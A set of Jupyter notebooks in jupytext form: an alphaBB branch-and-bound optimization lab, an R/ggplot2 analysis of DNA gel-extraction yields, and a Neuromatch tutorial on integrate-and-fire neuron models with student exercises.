sum = sum + x1 ** 2 / 4000
prod = prod * np.cos(x1 / sqrt(1))
sum = sum + x2 ** 2 / 4000
prod = prod * np.cos(x2 / sqrt(2))
y = sum - prod + 1
return y
def camel3(xx):
x1 = xx[0]
x2 = xx[1]
term1 = 2*x1**2
term2 = -1.05*x1**4
term3 = x1**6 / 6
term4 = x1*x2
term5 = x2**2
return term1 + term2 + term3 + term4 + term5
# ### Compute convex relaxations using $\alpha$BB method
# Returns cv($f(\mathbf x)$), for inputs $\mathbf x,\; f(\mathbf x),\; \alpha,\; \mathbf x^L\;$and $\mathbf x^U$
def relaxedFunction(x, function, alpha, lb, ub):
# using alphaBB method
lb = np.array(lb)
ub = np.array(ub)
y = # add your code here
return y
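For reference, the standard $\alpha$BB underestimator adds the quadratic term $\alpha\sum_i (x_i^L - x_i)(x_i^U - x_i)$ to $f$. Below is a self-contained sketch of one possible completion, kept as a separate helper so the exercise above stays blank:

```python
import numpy as np

def alpha_bb_underestimator(x, function, alpha, lb, ub):
    """Convex underestimator cv(f)(x) = f(x) + alpha * sum_i (lb_i - x_i) * (ub_i - x_i)."""
    x = np.asarray(x, dtype=float)
    lb = np.asarray(lb, dtype=float)
    ub = np.asarray(ub, dtype=float)
    # the added term is <= 0 on [lb, ub] and 0 at the box corners,
    # so the relaxation never exceeds f and touches it at the bounds
    return function(x) + alpha * float(np.sum((lb - x) * (ub - x)))
```

For a sufficiently large $\alpha$ (at least half the magnitude of the most negative Hessian eigenvalue of $f$ over the box), the resulting function is convex.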
# ### Compute upper bound for current node
# Writes "ubd" attribute of newly created nodes. Returns updated list of nodes.
def computeUpperBounds(nodes, objective):
for iNode in nodes:
if iNode["ubd"] == inf:
x0 = (np.array(iNode["lb"]) + np.array(iNode["ub"]))/2
bnds = []
            for i in range(0, len(iNode["lb"])):
                bnds.append((iNode["lb"][i], iNode["ub"][i]))
solUBD = sp.minimize(objective, x0, bounds = bnds, method='L-BFGS-B', jac=None)
iNode["ubd"] = solUBD.fun
return nodes
# ### Compute lower bound for current node
# Writes "lbd" attribute of newly created nodes. Returns updated list of nodes.
def computeLowerBounds(nodes, objective, alpha):
for iNode in nodes:
if iNode["ubd"] == inf:
x0 = (np.array(iNode["lb"]) + np.array(iNode["ub"]))/2
bnds = []
for i in range(0, len(lb)):
bnds.append((iNode["lb"][i], iNode["ub"][i]))
solLBD = sp.minimize(relaxedFunction, x0, args=(objective, alpha, iNode["lb"], iNode["ub"]), bounds = bnds, method='L-BFGS-B', jac=None)
iNode["lbd"] = solLBD.fun
return nodes
# ### Branch
def branching(nodes, globalLBD):
epsilonF = 0.001
chosenNode = nodes[0]
# choose node with lowest LBD
for iNode in nodes:
if iNode["lbd"] <= globalLBD + epsilonF:
chosenNode = iNode
break
# branch on variable with largest variable bounds
    delta = np.array(chosenNode["ub"]) - np.array(chosenNode["lb"])
indVariable = np.argmax(delta)
print("max delta: ", max(delta))
# simply branch in the middle
iNodeLeft = copy.deepcopy(chosenNode)
iNodeLeft["ub"][indVariable] = # add your code here
iNodeLeft["lbd"] = - inf
iNodeLeft["ubd"] = + inf
iNodeRight = copy.deepcopy(chosenNode)
iNodeRight["lb"][indVariable] = iNodeLeft["ub"][indVariable]
iNodeRight["lbd"] = - inf
iNodeRight["ubd"] = + inf
# bookkeeping
nodes.remove(chosenNode)
nodes.append(iNodeLeft)
nodes.append(iNodeRight)
return nodes
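The midpoint split left blank above can be sketched as a standalone helper (an assumption: branching bisects the chosen variable halfway between its local bounds):

```python
import copy

def bisect_node(node, j):
    """Split `node` at the midpoint of variable j; reset the children's bound estimates."""
    mid = 0.5 * (node["lb"][j] + node["ub"][j])
    left, right = copy.deepcopy(node), copy.deepcopy(node)
    left["ub"][j] = mid    # left child keeps the lower half
    right["lb"][j] = mid   # right child keeps the upper half
    for child in (left, right):
        child["lbd"], child["ubd"] = -float("inf"), float("inf")
    return left, right
```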
# ### Fathoming
# Returns true or false for given node and global upper bound.
def fathom(iNode, globalUBD):
# fathom if true
if # add your code here:
return True
else:
return False
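The usual fathoming rule discards a node whose lower bound cannot improve on the incumbent upper bound; a sketch (the tolerance name `epsilonF` mirrors the one used elsewhere in this lab):

```python
def should_fathom(node_lbd, global_ubd, epsilonF=0.001):
    """True if the node's lower bound is at or above the best known upper bound (within tolerance)."""
    return node_lbd >= global_ubd - epsilonF
```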
# ### Main function
# Returns global minimum for given objective function, box constraints: $\mathbf x^L\;$and $\mathbf x^U$, and $\alpha$.
def branchAndBoundAlgorithm(objective, lb, ub, alpha):
foundGlobalSolution = False
epsilonF = 0.001 # absolute tolerance
UBD = inf
LBD = -inf
nodes = []
# initial point
x0 = (np.array(lb) + np.array(ub))/2
bnds = []
for i in range(0, len(lb)):
bnds.append((lb[i], ub[i]))
# compute upper bound
solUBD = sp.minimize(objective, x0, bounds = bnds, method='L-BFGS-B', jac=None)
# compute lower bound
solLBD = sp.minimize(relaxedFunction, x0, bounds = bnds, args=(objective, alpha, lb, ub), method='L-BFGS-B', jac=None)
# current global upper and lower bounds
UBD = solUBD.fun
LBD = solLBD.fun
# create first node
node = {
"ubd": solUBD.fun,
"lbd": solLBD.fun,
"lb": lb,
"ub": ub
}
nodes.append(node)
iteration = 0
while not foundGlobalSolution:
# convergence check
if ( UBD - LBD ) < epsilonF:
foundGlobalSolution = True
print("diff ", UBD - LBD)
print("upper bound: ", UBD, "lower bound: ", LBD)
break
iteration = iteration + 1
print("iter: ", iteration)
        print("gap (UBD - LBD): ", UBD-LBD, "UBD: ", UBD, "LBD: ", LBD)
# branching (on largest diameter of local variable bounds)
nodes = branching(nodes, LBD)
# compute lower bound for newly created nodes
nodes = computeLowerBounds(nodes, objective, alpha)
# compute upper bound for newly created nodes
nodes = computeUpperBounds(nodes, objective)
# update global LBD and UBD
LBD = inf
for iNode in nodes:
LBD = min(LBD, iNode["lbd"])
UBD = min(UBD, iNode["ubd"])
# fathoming
nodes[:] = [x for x in nodes if not fathom(x, UBD)]
return UBD
# ### Plot objective function and relaxation for the first node
# you can ignore this cell - it's only for making nice plots
def plotFunctionAndRelaxation(function, lb, ub, alpha):
# define domain
numElem = 50
X = np.linspace(lb[0],ub[0], numElem, endpoint=True)
Y = np.linspace(lb[1],ub[1], numElem, endpoint=True)
X, Y = np.meshgrid(X, Y)
# figure
fig = plt.figure(figsize=(10,10))
ax = fig.add_subplot(111,projection='3d' )
# plot relaxation
zs = []
XX = np.ravel(X)
YY = np.ravel(Y)
for indX, x in enumerate(XX):
zs.append(relaxedFunction(np.array([XX[indX], YY[indX]]), function, alpha, lb, ub))
zs = np.array(zs)
ZZ = zs.reshape(X.shape)
ax.plot_wireframe(X,Y,ZZ, color='red')
# plot original function
zs = np.array(function([np.ravel(X), np.ravel(Y)])) # for normal function this might work as long as there is no vector math
Z = zs.reshape(X.shape)
# Surface plot:
plt.get_cmap('jet')
ax.plot_surface(X, Y, Z, cmap=plt.get_cmap('coolwarm'), antialiased=True)
plt.show()
# ### Solve the following global optimization problems
# +
# objective function: camel 3
lb = [-4.0, -5.0]
ub = [4.0, 5.0]
alpha = 0.5
plotFunctionAndRelaxation(camel3, lb, ub, alpha)
UBD = branchAndBoundAlgorithm(camel3, lb, ub, alpha)
# +
# objective function: adjiman
lb = [-4.0, -5.0]
ub = [4.0, 5.0]
alpha = 0.5
plotFunctionAndRelaxation(adjiman, lb, ub, alpha)
UBD = branchAndBoundAlgorithm(adjiman, lb, ub, alpha)
# -
# objective function: griewank
lb = [-5.0, -5.0]
ub = [3.0, 3.0]
alpha = 0.4
plotFunctionAndRelaxation(griewank, lb, ub, alpha)
UBD = branchAndBoundAlgorithm(griewank, lb, ub, alpha)
|
EngineeringOptimization/GitLab/Lab10.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3 (ipykernel)
# language: python
# name: python3
# ---
# # Visualizations of pFC PCR and pFC9 digest agarose gel DNA extraction results
import pandas as pd
import rpy2
# %load_ext rpy2.ipython
# Read dataframe with nanodrop results.
nanodrop = pd.read_csv('../tables/nanodrop_pFC_pcrs_and_digests.csv', sep='|') # pipe delim due to markdown
# Clean data.
nanodrop_trim = nanodrop.apply(lambda x: x.str.strip() if x.dtype == "object" else x)
nanodrop_trim
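The stripping step above only touches object (string) columns; here is a minimal illustration on hypothetical data:

```python
import pandas as pd

df = pd.DataFrame({
    "Sample_name": ["  pFC9 ", "pFC PCR  "],  # padded strings
    "ng_per_ul": [42.0, 17.5],                # numeric column left untouched
})
trimmed = df.apply(lambda c: c.str.strip() if c.dtype == "object" else c)
print(trimmed["Sample_name"].tolist())  # → ['pFC9', 'pFC PCR']
```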
# Plot data using ggplot2.
# + magic_args="-i nanodrop_trim" language="R"
# library(ggplot2)
# library(ggpubr)
# library(RColorBrewer)
#
# colnames(nanodrop_trim)
# -
# Format column names because they are wack.
# + magic_args="-i nanodrop_trim " language="R"
# nano.df <- nanodrop_trim
# colnames(nano.df) <- c(
# 'Sample_name', 'Sample_number', 'ng_per_ul',
# 'protein_ratio', 'salt_ratio', 'Date', 'Assay'
# )
# + magic_args="-w 12 -h 8 --units in" language="R"
#
# ggplot(nano.df, aes(x=Date, y=ng_per_ul, fill=Date)) + geom_boxplot() +
# facet_wrap(~Assay) + theme_pubr() + labs(
# y='ng/ul DNA', title='Agarose gel extraction yields'
# ) + scale_fill_brewer(palette='Dark2') +
# theme(text = element_text(size = 14))
# + magic_args="-w 12 -h 8 --units in" language="R"
#
# # ideal protein ratio value = 1.8
# # ideal salt ratio value >= 2
#
# # https://toptipbio.com/the-nanodrop-results-explained/
#
#
# ratios <- ggplot(nano.df, aes(x=protein_ratio, y=salt_ratio, color=Date, size=ng_per_ul)) +
# geom_point() +
# facet_wrap(~Assay) + theme_pubr() +
# scale_color_brewer(palette='Dark2') +
# labs(x='260/280', y='260/230') + theme(text = element_text(size = 14))
# ratios
# -
# Overall shows both salt and protein contamination.
# Add visualization of ideal ratio ranges.
# + magic_args="-w 12 -h 8 --units in" language="R"
#
# ratios + annotate("rect", xmin = 0, xmax = 4, ymin = -0.5, ymax = 3,
# alpha = .2, fill='red') +
# annotate("rect", xmin = 0, xmax = 2.75, ymin = 1.65, ymax = 3,
# alpha = .2, fill='yellow') +
# annotate("rect", xmin = 0, xmax = 1.8, ymin = 2, ymax = 3,
# alpha = .2, fill='green')
#
# -
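The same ideal-range check can be done in pandas on hypothetical values (thresholds from the comments above: 260/280 near 1.8, 260/230 ≥ 2; the ±0.1 window around 1.8 is an assumption):

```python
import pandas as pd

df = pd.DataFrame({
    "protein_ratio": [1.79, 1.20, 1.85],  # 260/280
    "salt_ratio":    [2.30, 0.90, 1.10],  # 260/230
})
ideal = df["protein_ratio"].between(1.7, 1.9) & (df["salt_ratio"] >= 2.0)
print(ideal.tolist())  # → [True, False, False]
```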
# ## 8-17-21 Extractions
nanodrop_8_17 = pd.read_csv('../tables/pFC9_LF_agarose_gel_extract_8-17-21.csv', sep=',')
nanodrop_8_17
all_nano = pd.concat([nanodrop, nanodrop_8_17], ignore_index=True)  # DataFrame.append is deprecated
all_nano
# Turn graphing scripts into functions.
# + language="R"
#
# rename_ratios <- function(df){
# # rename table columns as having / in column names (for nanodrop ratios) causes issues
#
# nano.df <- df
# colnames(nano.df) <- c(
# 'Sample_name', 'Sample_number', 'ng_per_ul',
# 'protein_ratio', 'salt_ratio', 'Date', 'Assay'
# )
# nano.df
# }
# + language="R"
#
# plot_nano_points <- function(nano.df){
#
# ggplot(nano.df, aes(x=protein_ratio, y=salt_ratio, color=Date, size=ng_per_ul)) +
# geom_point() +
# facet_wrap(~Assay) + theme_pubr() +
# scale_color_brewer(palette='Dark2') +
# labs(x='260/280', y='260/230') + theme(text = element_text(size = 14)) +
# theme(
# plot.title = element_text(color="black", size=18, face="bold"),
# axis.title.x = element_text(color="black", size=18, face="bold"),
# axis.title.y = element_text(color="black", size=18, face="bold"),
# axis.text.y = element_text(color="black", size=16, face="bold"),
# axis.text.x = element_text(color="black", size=16, face="bold"),
# strip.text = element_text(color="black", size=14, face="bold")
# )
#
# }
# -
# Plot all nanodrop agarose gel extraction data to date.
# + magic_args="-i all_nano -w 12 -h 8 --units in" language="R"
#
# all_nano.rename <- rename_ratios(all_nano)
# plot_nano_points(all_nano.rename)
# + magic_args="-i all_nano -w 12 -h 7 --units in" language="R"
#
# barbplot_yields <- function(nano.df){
# all_nano.rename <- rename_ratios(nano.df)
# agg.df.mean <- aggregate(all_nano.rename[, c('ng_per_ul')], list(all_nano.rename$Date, all_nano.rename$Assay), mean)
# agg.df.sd <- aggregate(all_nano.rename[, c('ng_per_ul')], list(all_nano.rename$Date, all_nano.rename$Assay), sd)
# agg.df <- agg.df.mean
# agg.df$sd <- agg.df.sd$x
#
# ggplot(agg.df, aes(x=Group.1, y=x, fill=Group.1)) + geom_bar(stat='identity', color='black', size=1) +
# geom_errorbar( aes(x=Group.1, ymin=x-sd, ymax=x+sd), width=0.4, colour="black", size=1) +
# facet_wrap(~Group.2) +
# scale_color_brewer(palette='Dark2') + theme_pubr() +
# labs(y='DNA (ng / ul)', x='Date') + theme(legend.position = "none") +
# theme(
# plot.title = element_text(color="black", size=18, face="bold"),
# axis.title.x = element_text(color="black", size=18, face="bold"),
# axis.title.y = element_text(color="black", size=18, face="bold"),
# axis.text.y = element_text(color="black", size=16, face="bold"),
# axis.text.x = element_text(color="black", size=16, face="bold"),
# strip.text = element_text(color="black", size=14, face="bold")
# ) +
# coord_flip()
# }
#
# barbplot_yields(all_nano)
|
experiments/VR-inserts/notebooks/.ipynb_checkpoints/Agarose_gel_extractions-checkpoint.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] colab_type="text" id="view-in-github"
# <a href="https://colab.research.google.com/github/NeuromatchAcademy/course-content/blob/master/tutorials/W1D1_ModelTypes/student/W1D1_Tutorial2.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>
# + [markdown] colab_type="text" id="HwYPw4CvrYCV"
# # NMA Model Types Tutorial 2: "How" models
#
# In this tutorial we will explore models that can potentially explain *how* the spiking data we have observed is produced. That is, the models will tell us something about the *mechanism* underlying the physiological phenomenon.
#
# Our objectives:
# - Write code to simulate a simple "leaky integrate-and-fire" neuron model
# - Make the model more complicated — but also more realistic — by adding more physiologically-inspired details
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 519} colab_type="code" id="nfdfxF_ee8sZ" outputId="26bd0ee4-4ac1-45b3-d75c-2425ac20a06b"
#@title Video: "How" models
from IPython.display import YouTubeVideo
video = YouTubeVideo(id='yWPQsBud4Cc', width=854, height=480, fs=1)
print("Video available at https://youtube.com/watch?v=" + video.id)
video
# + [markdown] colab_type="text" id="yQN8ug6asey4"
# ## Setup
#
# **Don't forget to execute the hidden cells!**
# + cellView="form" colab={} colab_type="code" id="w6RPNLB6rYCW"
#@title Imports
import matplotlib.pyplot as plt
import numpy as np
import scipy.stats as stats
import ipywidgets as widgets
# + cellView="form" colab={} colab_type="code" id="CK1bXaOgrYCZ"
#@title Helper Functions
def histogram(counts, bins, vlines=(), ax=None, ax_args=None, **kwargs):
"""Plot a step histogram given counts over bins."""
if ax is None:
_, ax = plt.subplots()
# duplicate the first element of `counts` to match bin edges
counts = np.insert(counts, 0, counts[0])
ax.fill_between(bins, counts, step="pre", alpha=0.4, **kwargs) # area shading
ax.plot(bins, counts, drawstyle="steps", **kwargs) # lines
for x in vlines:
ax.axvline(x, color='r', linestyle='dotted') # vertical line
if ax_args is None:
ax_args = {}
# heuristically set max y to leave a bit of room
ymin, ymax = ax_args.get('ylim', [None, None])
if ymax is None:
ymax = np.max(counts)
if ax_args.get('yscale', 'linear') == 'log':
ymax *= 1.5
else:
ymax *= 1.1
if ymin is None:
ymin = 0
if ymax == ymin:
ymax = None
ax_args['ylim'] = [ymin, ymax]
ax.set(**ax_args)
ax.autoscale(enable=False, axis='x', tight=True)
def plot_neuron_stats(v, spike_times):
fig, (ax1, ax2) = plt.subplots(ncols=2, figsize=(12, 5))
# membrane voltage trace
ax1.plot(v[0:100])
ax1.set(xlabel='Time', ylabel='Voltage')
# plot spike events
for x in spike_times:
if x >= 100:
break
ax1.axvline(x, color='limegreen')
# ISI distribution
isi = np.diff(spike_times)
    bins = np.arange(isi.min(), isi.max() + 2) - .5  # integer-width bins centered on ISI values
counts, bins = np.histogram(isi, bins)
vlines = []
if len(isi) > 0:
vlines = [np.mean(isi)]
xmax = max(20, int(bins[-1])+5)
histogram(counts, bins, vlines=vlines, ax=ax2, ax_args={
'xlabel': 'Inter-spike interval',
'ylabel': 'Number of intervals',
'xlim': [0, xmax]
})
# + [markdown] colab_type="text" id="kOxLk8AvrYCe"
# ## The Linear Integrate-and-Fire Neuron
#
# One of the simplest models of spiking neuron behavior is the linear integrate-and-fire model neuron. In this model, the neuron increases its membrane potential $V_m$ over time in response to excitatory input currents $I$ scaled by some factor $\alpha$:
#
# \begin{align}
# dV_m = {\alpha}I
# \end{align}
#
# Once $V_m$ reaches a threshold value of 1, a spike is emitted, the neuron resets $V_m$ back to 0, and the process continues.
#
# #### Spiking Inputs
#
# We now have a model for the neuron dynamics. Next we need to consider what form the input $I$ will take. How should we represent the firing behavior of the presynaptic neurons providing the input to our model neuron? We learned previously that a good approximation of spike timing is a Poisson random variable, so we can use that here as well
#
# \begin{align}
# I \sim Poisson(\lambda)
# \end{align}
#
# where $\lambda$ is the average rate of incoming spikes.
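The Poisson input described above can be sampled directly with `scipy.stats` (a sketch; `random_state` is fixed only for reproducibility):

```python
from scipy import stats

# 1000 draws of per-step spike counts with mean rate lambda = 10
samples = stats.poisson(mu=10).rvs(size=1000, random_state=0)
print(samples.mean())  # close to lambda = 10
```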
# + [markdown] colab_type="text" id="Ls8CsM2Pf7LQ"
# ### Exercise: Compute $dV_m$
#
# For your first exercise, you will write the code to compute the change in voltage $dV_m$ of the linear integrate-and-fire model neuron. The rest of the code to handle the neuron dynamics is provided for you, so you just need to fill in a definition for `dv` in the `lif_neuron` method below. The value for $\lambda$ needed for the Poisson random variable is named `rate`.
#
# TIP: The [`scipy.stats`](https://docs.scipy.org/doc/scipy/reference/stats.html) package is a great resource for working with and sampling from various probability distributions.
# + colab={} colab_type="code" id="HQU61YUDrYCe"
def lif_neuron(n_steps=1000, alpha=0.01, rate=10):
""" Simulate a linear integrate-and-fire neuron.
Args:
n_steps (int): The number of time steps to simulate the neuron's activity.
alpha (float): The input scaling factor
rate (int): The mean rate of incoming spikes
"""
v = np.zeros(n_steps)
spike_times = []
for i in range(1, n_steps):
#######################################################################
## TODO for students: compute dv, then remove the NotImplementedError #
#######################################################################
# dv = ...
        raise NotImplementedError("Student exercise: compute the change in membrane potential")
v[i] = v[i-1] + dv
if v[i] > 1:
spike_times.append(i)
v[i] = 0
return v, spike_times
# Uncomment these lines after completing the lif_neuron function
# v, spike_times = lif_neuron()
# plot_neuron_stats(v, spike_times)
# + [markdown] cellView="both" colab={"base_uri": "https://localhost:8080/", "height": 340} colab_type="text" id="u-oCuaFAiRi5" outputId="3e4c9e97-cd68-4b4a-d346-4baea254e082"
# [*Click for solution*](https://github.com/NeuromatchAcademy/course-content/tree/master//tutorials/W1D1_ModelTypes/solutions/W1D1_Tutorial2_Solution_f0c3783f.py)
#
# *Example output:*
#
# <img alt='Solution hint' align='left' width=749 height=331 src=https://raw.githubusercontent.com/NeuromatchAcademy/course-content/master/tutorials/W1D1_ModelTypes/static/W1D1_Tutorial2_Solution_f0c3783f_0.png>
#
#
# + [markdown] colab_type="text" id="V9xEZVAHr5Kv"
# ### Parameter Exploration
#
# Here's an interactive demo that shows how the model behavior changes for different parameter values.
#
# **Remember to enable the demo by running the cell.**
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 430, "referenced_widgets": ["ceba379285d8420eab122d92e37cf614", "ce36febaaf2d4393b40ea270eea78bda", "335dc79d7de5472b8feab6962ba2c5d8", "f03f445c87fd41daa39efbe68c55afe6", "91bbca9d32e44b579f90cc2c57af6162", "1251eebb98c44304bb2b44b5967e04ed", "13178c66d344425e8033ccb71d5952cd", "bfbb00cee53142b0be230d2911200e78", "98600f1df3694f7f8f395241786bf8ec", "<KEY>", "<KEY>", "<KEY>", "cb20954f9e4e40189e7517984d429f9e"]} colab_type="code" id="RRjD0G3nrYCh" outputId="f1ca24c3-098d-4482-d39e-8dd705d6b790"
#@title Linear Integrate-and-Fire Model Neuron Explorer
def _lif_neuron(n_steps=1000, alpha=0.01, rate=10):
exc = stats.poisson(rate).rvs(n_steps)
v = np.zeros(n_steps)
spike_times = []
for i in range(1, n_steps):
dv = alpha * exc[i]
v[i] = v[i-1] + dv
if v[i] > 1:
spike_times.append(i)
v[i] = 0
return v, spike_times
@widgets.interact(
n_steps=widgets.FloatLogSlider(1000.0, min=2, max=4),
alpha=widgets.FloatLogSlider(0.01, min=-4, max=-1),
rate=widgets.IntSlider(10, min=1, max=20)
)
def plot_lif_neuron(n_steps=1000, alpha=0.01, rate=10):
v, spike_times = _lif_neuron(int(n_steps), alpha, rate)
plot_neuron_stats(v, spike_times)
# + [markdown] colab_type="text" id="91UgFMVPrYCk"
# ## Inhibitory signals
#
# Our linear integrate-and-fire neuron from the previous section was indeed able to produce spikes, but the actual spiking behavior did not line up with our expectations of exponentially distributed ISIs. This means we need to refine our model!
#
# In the previous model we only considered excitatory behavior -- the only way the membrane potential could decrease is upon a spike event. We know, however, that there are other factors that can drive $V_m$ down. First is the natural tendency of the neuron to return to some steady state or resting potential. We can update our previous model as follows:
#
# \begin{align}
# dV_m = -{\beta}V_m + {\alpha}I
# \end{align}
#
# where $V_m$ is the current membrane potential and $\beta$ is some leakage factor. This is a basic form of the popular Leaky Integrate-and-Fire model neuron (for a more detailed discussion of the LIF Neuron, see the Appendix).
#
# We also know that in addition to excitatory presynaptic neurons, we can have inhibitory presynaptic neurons as well. We can model these inhibitory neurons with another Poisson random variable, giving us
#
# \begin{align}
# I = I_{exc} - I_{inh} \\
# I_{exc} \sim Poisson(\lambda_{exc}) \\
# I_{inh} \sim Poisson(\lambda_{inh})
# \end{align}
#
# where $\lambda_{exc}$ and $\lambda_{inh}$ are the rates of the excitatory and inhibitory presynaptic neurons, respectively.
# + [markdown] colab_type="text" id="3tErnV24y_Pa"
# ### Exercise: Compute $dV_m$ with inhibitory signals
#
# For your second exercise, you will again write the code to compute the change in voltage $dV_m$, though now for the LIF model neuron described above. Like last time, the rest of the code needed to handle the neuron dynamics is provided for you, so you just need to fill in a definition for `dv` below.
#
# + colab={} colab_type="code" id="RfT7XE_UzUUl"
def lif_neuron_inh(n_steps=1000, alpha=0.5, beta=0.1, exc_rate=10, inh_rate=10):
""" Simulate a simplified leaky integrate-and-fire neuron with both excitatory
and inhibitory inputs.
Args:
n_steps (int): The number of time steps to simulate the neuron's activity.
alpha (float): The input scaling factor
beta (float): The membrane potential leakage factor
exc_rate (int): The mean rate of the incoming excitatory spikes
inh_rate (int): The mean rate of the incoming inhibitory spikes
"""
v = np.zeros(n_steps)
spike_times = []
for i in range(1, n_steps):
############################################################
## Students: compute dv and remove the NotImplementedError #
############################################################
# dv = ...
        raise NotImplementedError("Student exercise: compute the change in membrane potential")
v[i] = v[i-1] + dv
if v[i] > 1:
spike_times.append(i)
v[i] = 0
return v, spike_times
# Uncomment these lines to make the plot once you've completed the function
# v, spike_times = lif_neuron_inh()
# plot_neuron_stats(v, spike_times)
# + [markdown] cellView="both" colab={} colab_type="text" id="opfSK1CrrYCk"
# [*Click for solution*](https://github.com/NeuromatchAcademy/course-content/tree/master//tutorials/W1D1_ModelTypes/solutions/W1D1_Tutorial2_Solution_da94ffb5.py)
#
#
# + colab={"base_uri": "https://localhost:8080/", "height": 334} colab_type="code" id="66msnOg2_R65" outputId="ec69c319-9c78-4358-fc2b-c5150b461da7"
v, spike_times = lif_neuron_inh()
plot_neuron_stats(v, spike_times)
# + [markdown] colab_type="text" id="wTiAaeX4zuhn"
# ### Parameter Exploration
#
# Like last time, you can now explore how your LIF model behaves when the various parameters of the system are changed.
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 494, "referenced_widgets": ["0f09df3ceeae48a387d0fc6b908b5567", "<KEY>", "9fd68b3ef90242d2ba97505ca56114aa", "e3b2afface834d268c55d859f854e908", "967e42b786084dd8b7ec89d0e629092d", "7c579a4e4e234f36ae753e4cc9836579", "cc9589e5f00c42cc964af4172428c827", "<KEY>", "ff7ab8e46044463c94adef7cd4b67fea", "9735482f9bcd40b9926801e91ba8d4ce", "f8c107c262754347abba720716fb0f42", "<KEY>", "40394324c52e4e1298dc5e745a1f1d0f", "<KEY>", "<KEY>", "<KEY>", "10565e172d4e453b9305557675df1e8f", "<KEY>", "5dd8a2dc5f954ad8ba909fe7849ba815"]} colab_type="code" id="Eh3wR_nArYCn" outputId="fd0b6976-8a39-42ce-a77f-a61278d30689"
#@title LIF Model Neuron with Inhibitory Inputs Explorer
def _lif_neuron_inh(n_steps=1000, alpha=0.5, beta=0.1, exc_rate=10, inh_rate=10):
""" Simulate a simplified leaky integrate-and-fire neuron with both excitatory
and inhibitory inputs.
Args:
n_steps (int): The number of time steps to simulate the neuron's activity.
alpha (float): The input scaling factor
beta (float): The membrane potential leakage factor
exc_rate (int): The mean rate of the incoming excitatory spikes
inh_rate (int): The mean rate of the incoming inhibitory spikes
"""
# precompute Poisson samples for speed
exc = stats.poisson(exc_rate).rvs(n_steps)
inh = stats.poisson(inh_rate).rvs(n_steps)
v = np.zeros(n_steps)
spike_times = []
for i in range(1, n_steps):
dv = -beta * v[i-1] + alpha * (exc[i] - inh[i])
v[i] = v[i-1] + dv
if v[i] > 1:
spike_times.append(i)
v[i] = 0
return v, spike_times
@widgets.interact(n_steps=widgets.FloatLogSlider(1000.0, min=2, max=4),
alpha=widgets.FloatLogSlider(0.5, min=-2, max=1),
beta=widgets.FloatLogSlider(0.1, min=-2, max=0),
exc_rate=widgets.IntSlider(10, min=1, max=20),
inh_rate=widgets.IntSlider(10, min=1, max=20))
def plot_lif_neuron(n_steps=1000, alpha=0.5, beta=0.1, exc_rate=10, inh_rate=10):
v, spike_times = _lif_neuron_inh(int(n_steps), alpha, beta, exc_rate, inh_rate)
plot_neuron_stats(v, spike_times)
# + cellView="form" colab={"base_uri": "https://localhost:8080/", "height": 519} colab_type="code" id="or1Tt4TSfQwp" outputId="6354a165-972d-4834-f507-ada332fb423f"
#@title Video: Balanced inputs
from IPython.display import YouTubeVideo
video = YouTubeVideo(id='buXEQPp9LKI', width=854, height=480, fs=1)
print("Video available at https://youtube.com/watch?v=" + video.id)
video
# + [markdown] colab_type="text" id="pKCzc7Fjz8zK"
# ## Appendix
# + [markdown] colab_type="text" id="xn34Ieffz_ZO"
# ### Why do neurons spike?
#
# A neuron stores energy in an electric field across its cell membrane by controlling the distribution of charges (ions) on either side of the membrane. This energy is rapidly discharged to generate a spike when the field potential (or membrane potential) crosses a threshold. The membrane potential may be driven toward or away from this threshold by inputs from other neurons: excitatory or inhibitory, respectively. The membrane potential also tends to revert to a resting potential, for example due to the leakage of ions across the membrane, so that reaching the spiking threshold depends not only on the total input received since the last spike, but also on the timing of that input.
#
# The storage of energy by maintaining a field potential across an insulating membrane can be modeled by a capacitor. The leakage of charge across the membrane can be modeled by a resistor. This is the basis for the leaky integrate-and-fire neuron model.
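The capacitor/resistor analogy maps directly onto a couple of lines of code. Below is a minimal sketch of one forward-Euler step of the RC membrane equation; the function name and all parameter values are illustrative choices, not the tutorial's own.

```python
# Illustrative membrane parameters (not the tutorial's values)
C_m, R_m, V_rest, dt = 1.0, 10.0, 0.0, 0.1

def rc_membrane_step(v, i_input):
    """One forward-Euler step of C_m * dV/dt = -(V - V_rest) / R_m + I."""
    dv = (-(v - V_rest) / R_m + i_input) * (dt / C_m)
    return v + dv

# With no input, the potential leaks back toward V_rest
v = 1.0
trace = [v]
for _ in range(200):
    v = rc_membrane_step(v, 0.0)
    trace.append(v)
```

Each step shrinks the deviation from `V_rest` by a factor `1 - dt / (R_m * C_m)`, the discrete analogue of the exponential decay of an RC circuit.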
# + [markdown] colab_type="text" id="pwZOhsV60WPM"
# ### The LIF Model Neuron
#
# The full equation for the LIF neuron is
#
# \begin{align}
# C_{m}\frac{dV_m}{dt} = -(V_m - V_{rest})/R_{m} + I
# \end{align}
#
# where $C_m$ is the membrane capacitance, $R_m$ is the membrane resistance, $V_{rest}$ is the resting potential, and $I$ is some input current (from other neurons, an electrode, ...).
#
# In our above examples we set many of these properties to convenient values ($C_m = R_m = dt = 1$, $V_{rest} = 0$) to focus more on the overall behavior, though these too can be manipulated to achieve different dynamics.
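To see how the simplified updates used earlier relate to the full equation, here is a hedged sketch that integrates the equation above with every parameter exposed. The function name, the defaults, the threshold/reset rule, and the toy Poisson input are all illustrative assumptions, not code from this tutorial.

```python
import numpy as np

def lif_full(n_steps=1000, C_m=1.0, R_m=10.0, V_rest=0.0, dt=1.0,
             threshold=1.0, I=None, seed=0):
    """Forward-Euler integration of C_m * dV/dt = -(V - V_rest)/R_m + I,
    with a spike-and-reset rule once V crosses `threshold`."""
    rng = np.random.default_rng(seed)
    if I is None:
        I = 0.1 * rng.poisson(1.0, n_steps)  # toy input current
    v = np.full(n_steps, V_rest, dtype=float)
    spike_times = []
    for t in range(1, n_steps):
        dv = (-(v[t - 1] - V_rest) / R_m + I[t]) * (dt / C_m)
        v[t] = v[t - 1] + dv
        if v[t] > threshold:
            spike_times.append(t)
            v[t] = V_rest  # reset after the spike
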